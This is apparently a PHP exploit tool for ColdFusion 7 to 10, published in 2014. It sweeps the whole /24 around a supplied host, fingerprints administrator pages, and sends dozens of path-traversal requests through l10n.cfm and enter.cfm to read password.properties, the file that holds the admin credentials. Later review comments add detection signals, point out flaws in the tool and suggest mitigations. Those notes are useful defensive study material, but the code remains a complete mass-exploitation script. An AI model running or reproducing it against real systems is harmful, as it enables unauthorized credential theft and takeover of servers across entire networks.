<?php
/*
#####################################################################
# Name : ColdFusion 7>10 All-in-one Exploit #
# Description : CF7>10 Local File Disclosure [password.properties] #
# Risk Level : High-level [Root/SystemAdmin access] #
# Coded By : Mr.aFiR [03-2014] #
# Resources : http://www.blackhatlibrary.net/Coldfusion_hacking #
# http://www.exploit-db.com/exploits/30210/ #
# http://www.exploit-db.com/exploits/25305/ #
#####################################################################
BTC Donations are accepted on: 1Cm2naxWqDznUQvXiNEFxrU8hRQFmBwUfJ
Note: Using this tool against any system without authorization is a criminal act.
*/
// Silence every PHP notice and warning: failed DNS lookups, file reads and HTTP
// requests further down therefore fail without any diagnostic.
error_reporting(0);
// Running totals shown in the final summary line.
// $VULNz is incremented once per positive probe inside checkExploit(), so a host
// that answers several probes is counted several times even though the summary
// labels it "vulnerable host(s)".
$VULNz = 0;
// $Ninez counts hosts for which checkifNine() returned true.
$Ninez = 0;
?>
<html><title>CFM 2</title>
<style>
body {
background-color:#000000;
color:#FFFFFF;
font-family:Arial;
margin-bottom:30px;
margin-top:80px;
}
a {
color:yellow;
text-decoration:none;
}
input {
background-color:#000000;
color:#FFFFFF;
border:1px solid #333333;
}
#xline {
position:fixed;
top:0px;
left:0px;
right:0px;
background-color:#000000;
padding:10px;
}
</style>
<div id="xline">
<form action="" method="post">
<input type="text" name="target"> => <? if($_POST['target']){ print $_POST['target']; } ?>
</form>
</div>
<pre>
<?
// Target intake: the operator-supplied POST value is resolved and widened to the
// whole /24 that contains it, so each run touches 256 addresses, not one host.
// NOTE(review): any authorisation to run this has to cover that full range,
// because the neighbours of the named host are probed as well.
// NOTE(review): this same $_POST['target'] is echoed without escaping in the
// form header of this page, so the tool's own UI reflects markup supplied in the
// request (htmlspecialchars() is missing there).
$range = $_POST['target'];
if(!$range){ print "<span style='color:yellow;'>\n ===== A host is required =====\n > php x.php [host] \n\n"; exit; }
// Resolve the name to a dotted IPv4 string and keep only its first three octets.
$range = gethostbyname($range);
$range = explode(".",$range);
$nange = $range[0].".".$range[1].".".$range[2];
$range = $range[0].".".$range[1].".".$range[2].".0-255";
// "vip" is a local file opened in append mode that records every prefix already
// swept; if the prefix is found in it (substring match via strstr) the run stops.
if(strstr(file_get_contents("vip"),$nange)){ die("Already scanned this range!"); }
$fh = fopen("vip","a"); fwrite($fh,$nange."\n"); fclose($fh);
// Turn "a.b.c.0-255" into four arrays of integers, one per octet: a single value
// for the first three octets and a [low, high] pair for the last.
$range = explode('.', $range );
foreach( $range as $index=>$octet )
$range[$index] = array_map( 'intval', explode('-',$octet) );
// Sweep every address described by $range. Each octet loops from its low value
// to its high value, falling back to the low value when no high value is set.
for( $octet1=$range[0][0]; $octet1<=(($range[0][1])? $range[0][1]:$range[0][0]); $octet1++ )
for( $octet2=$range[1][0]; $octet2<=(($range[1][1])? $range[1][1]:$range[1][0]); $octet2++ )
for( $octet3=$range[2][0]; $octet3<=(($range[2][1])? $range[2][1]:$range[2][0]); $octet3++ )
for( $octet4=$range[3][0]; $octet4<=(($range[3][1])? $range[3][1]:$range[3][0]); $octet4++ )
{
$ip = $octet1.".".$octet2.".".$octet3.".".$octet4;
// First request per host: the ColdFusion administrator login page over plain
// HTTP with a 1-second connect timeout. CURLOPT_RETURNTRANSFER is not set, so
// curl_exec() writes the body to output and the ob_* calls capture it in $buffer.
$x = curl_init();
curl_setopt($x, CURLOPT_URL, "http://".$ip."/CFIDE/administrator/enter.cfm");
curl_setopt($x,CURLOPT_CONNECTTIMEOUT,1);
ob_start();
curl_exec( $x );
$buffer = ob_get_contents();
ob_end_clean();
// Locate the <title> element; its text decides how the host is classified.
$title_start = strpos( $buffer, '<title>')+strlen('<title>');
$title_end = strpos( $buffer, '</title>');
// The bracketed number is the running hit counter $VULNz, not a host index.
print "[".$VULNz."] ".$ip." : ";
flush(); ob_flush();
if( $title_end!==false ){
$ttl = trim(substr( $buffer, $title_start, $title_end-$title_start ));
// A title containing "Cold" is treated as a ColdFusion administrator page.
// NOTE(review): $ttl comes from the remote response and is printed into this
// HTML page without htmlspecialchars() here and in the gray branch below, so a
// scanned host controls markup rendered in the operator's browser.
if(strstr($ttl, "Cold")){
print "<span style='color:green;'>".$ttl."</span>\n";
flush(); ob_flush();
// Notes for defenders, derived from the requests issued below:
//  - every probe is a GET under /CFIDE/: either adminapi/customtags/l10n.cfm
//    with an attributes.file parameter, or administrator/enter.cfm with a
//    locale parameter; the value is a run of ../ or ..\ segments ending in
//    password.properties, and the enter.cfm variants append a literal %00;
//  - urlencode() is applied to the traversal string, so the separators reach
//    the server percent-encoded and log matching has to cover the encoded form;
//  - the probes arrive as a burst from one client right after a request for
//    /CFIDE/administrator/enter.cfm, and the same sequence repeats for each
//    address of the /24 in ascending order;
//  - checkExploit() treats a response containing "password=" as a hit, so a
//    response from these paths carrying that string means the file was read;
//  - /CFIDE/administrator and /CFIDE/adminapi do not need to be reachable from
//    untrusted networks: restricting them at the web server or firewall and
//    applying current vendor updates removes the exposure.
if(checkifNine($ip)){
$Ninez = $Ninez + 1;
print " <span style='color:yellow;'>======================= ColdFusion 9 =======================</span>\n";
print " => CF9 LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties")); flush(); ob_flush();
print " => CF9 LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties")); flush(); ob_flush();
print " => CF9 LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties")); flush(); ob_flush();
print " => CF9 LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties")); flush(); ob_flush();
print " => CF9 WIN Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("..\..\..\..\..\..\..\..\..\ColdFusion9\lib\password.properties")); flush(); ob_flush();
print " => CF9 WIN Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("..\..\..\..\..\..\..\..\..\ColdFusion9\cfusion\lib\password.properties")); flush(); ob_flush();
print " => CF9 WIN Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties")); flush(); ob_flush();
print " => CF9 LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties")); flush(); ob_flush();
print " => CF9 LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties")); flush(); ob_flush();
}else{
// Host did not match the loginbackground.jpg fingerprint: the remaining
// install-path guesses are tried, each labelled with the version it targets.
print " => CF6 WIN Checking ... "; checkExploit($ip, "CFIDE/administrator/enter.cfm?locale=".urlencode("..\..\..\..\..\..\..\..\CFusionMX\lib\password.")."properties%00en"); flush(); ob_flush();
print " => CF7 WIN Checking ... "; checkExploit($ip, "CFIDE/administrator/enter.cfm?locale=".urlencode("..\..\..\..\..\..\..\..\CFusionMX7\lib\password.")."properties%00en"); flush(); ob_flush();
print " => CF8 WIN Checking ... "; checkExploit($ip, "CFIDE/administrator/enter.cfm?locale=".urlencode("..\..\..\..\..\..\..\..\ColdFusion8\lib\password.")."properties%00en"); flush(); ob_flush();
print " => WIN Old Checking ... "; checkExploit($ip, "CFIDE/administrator/enter.cfm?locale=".urlencode("..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.")."properties%00en"); flush(); ob_flush();
print " => CFX LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../lib/password.properties")); flush(); ob_flush();
print " => CFX WIN Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("..\..\lib\password.properties")); flush(); ob_flush();
print " => CF10 WIN Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("..\..\..\..\..\..\..\..\..\ColdFusion10\lib\password.properties")); flush(); ob_flush();
print " => CF10 WIN Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("..\..\..\..\..\..\..\..\..\ColdFusion10\cfusion\lib\password.properties")); flush(); ob_flush();
print " => CF10 WIN Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties")); flush(); ob_flush();
print " => CF10 LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties")); flush(); ob_flush();
print " => CF10 LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties")); flush(); ob_flush();
print " => CF10 LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties")); flush(); ob_flush();
print " => CF10 WIN Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("..\..\..\..\..\..\..\..\..\ColdFusion10\lib\password.properties")); flush(); ob_flush();
print " => CF10 WIN Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("..\..\..\..\..\..\..\..\..\ColdFusion10\cfusion\lib\password.properties")); flush(); ob_flush();
print " => CF10 LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties")); flush(); ob_flush();
}
}else{
// A title was found but it does not contain "Cold": shown in gray, not probed.
print "<span style='color:gray;'>".$ttl."</span>\n";
flush(); ob_flush();
}
}elseif( strlen($buffer)>0 ){
// A body was captured but it has no closing </title> tag.
print "<span style='color:red;'>Cannot get title</span>\n";
flush(); ob_flush();
}else{
// Nothing was captured from the request at all.
print "<span style='color:red;'>[Not a site]</span>\n";
flush(); ob_flush();
}
}
// Final tally: positive probes counted by checkExploit() and hosts that matched
// checkifNine().
print "\n<span style='color:yellow;'> ===== Scan finished with ".$VULNz." vulnerable host(s) | $Ninez</span>\n";
/**
 * Request one candidate URL on a host and report whether the response looks
 * like a disclosed password.properties file.
 *
 * The only success criterion is the literal substring "password=" anywhere in
 * the response body. For defenders that is the useful signal: a response served
 * from a /CFIDE/ path that contains "password=" means the file was read.
 *
 * Side effects: prints an HTML status fragment and, on a hit, increments the
 * global $VULNz counter. Nothing is returned.
 *
 * @param string $ip  Host address, placed directly after "http://".
 * @param string $url Path and query string appended after the host.
 */
function checkExploit($ip, $url){
// $colors is declared global but is not used anywhere in this function.
global $colors; global $VULNz;
$lnk = "http://".$ip."/".$url;
// Plain HTTP with a 1-second connect timeout. CURLOPT_RETURNTRANSFER is not set,
// so curl_exec() writes the body to output and the ob_* calls capture it.
$xp = curl_init();
curl_setopt($xp, CURLOPT_URL, $lnk);
curl_setopt($xp,CURLOPT_CONNECTTIMEOUT,1);
ob_start();
curl_exec( $xp );
$buff = ob_get_contents();
ob_end_clean();
if(strstr($buff,"password=")){
// Hit: the full request URL is printed as a clickable link in the report.
print "<span style='color:green;'>VULN: <a href='".$lnk."'>{PwN}</a></span>";
flush(); ob_flush();
$VULNz = $VULNz+1;
}else{
// NOTE(review): "PATCHED" is printed for every response without "password=",
// including timeouts and wrong path guesses, so it is not evidence that the
// host has been updated.
print "<span style='color:red;'>PATCHED</span>";
flush(); ob_flush();
}
print "\n";
}
/**
 * Fingerprint a host by hashing a static image from its administrator UI.
 *
 * Downloads /CFIDE/administrator/images/loginbackground.jpg over plain HTTP and
 * compares the MD5 of the bytes with one hard-coded digest. Presumably that
 * digest belongs to the ColdFusion 9 login background (inferred from the
 * function name and the caller's "ColdFusion 9" banner; the file does not say
 * where the value comes from).
 *
 * For defenders: static assets under /CFIDE/administrator/ that are readable
 * without authentication let a remote client identify the installed version, so
 * that directory belongs behind the same access restriction as the admin pages.
 *
 * @param string $ip Host address, placed directly after "http://".
 * @return bool True when the digest matches, false otherwise.
 */
function checkifNine($ip){
// Neither global is used in this function.
global $colors; global $VULNz;
$url = "CFIDE/administrator/images/loginbackground.jpg";
$lnk = "http://".$ip."/".$url;
// A failed download yields false, whose MD5 does not match the digest below.
$img = file_get_contents($lnk);
$imghash = "596b3fc4f1a0b818979db1cf94a82220";
// NOTE(review): loose == is used to compare two hex digests; === is the safe
// form for hash comparison in PHP.
if(md5($img)==$imghash){
return true;
}else{
return false;
}
}
?>
<script type="text/javascript"> window.scrollTo(0,document.body.scrollHeight); </script>
</pre>
</html>